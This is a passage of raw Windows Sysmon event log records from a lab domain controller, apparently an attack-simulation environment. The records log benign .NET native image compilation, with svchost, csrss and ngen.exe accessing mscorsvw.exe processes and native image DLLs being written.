13:26:34.247{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468A-6000-8404-000000009A01}2424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.231{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-468A-6000-8404-000000009A01}2424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.231{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468A-6000-8404-000000009A01}2424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468A-6000-8304-000000009A01}3452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.028{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-468A-6000-8304-000000009A01}3452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.028{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468A-6000-8304-000000009A01}3452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.622{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468B-6000-8C04-000000009A01}4952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.606{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-468B-6000-8C04-000000009A01}4952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.606{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468B-6000-8C04-000000009A01}4952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.544{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468B-6000-8B04-000000009A01}3724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.528{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-468B-6000-8B04-000000009A01}3724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.528{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468B-6000-8B04-000000009A01}3724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:35.466{08A6967A-468B-6000-8A04-000000009A01}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11b8-0\System.Numerics.dll2021-01-14 13:26:35.466 10341000x80000000000000008693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.325{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468B-6000-8A04-000000009A01}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.309{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-468B-6000-8A04-000000009A01}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.309{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468B-6000-8A04-000000009A01}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.278{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468B-6000-8904-000000009A01}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.262{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-468B-6000-8904-000000009A01}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.262{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468B-6000-8904-000000009A01}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:35.216{08A6967A-468B-6000-8804-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\550-0\System.Net.Http.WebRequest.dll2021-01-14 13:26:35.216 10341000x80000000000000008686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.169{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468B-6000-8804-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008685Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.153{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-468B-6000-8804-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.153{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468B-6000-8804-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.106{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468B-6000-8704-000000009A01}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.090{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-468B-6000-8704-000000009A01}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:35.090{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468B-6000-8704-000000009A01}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.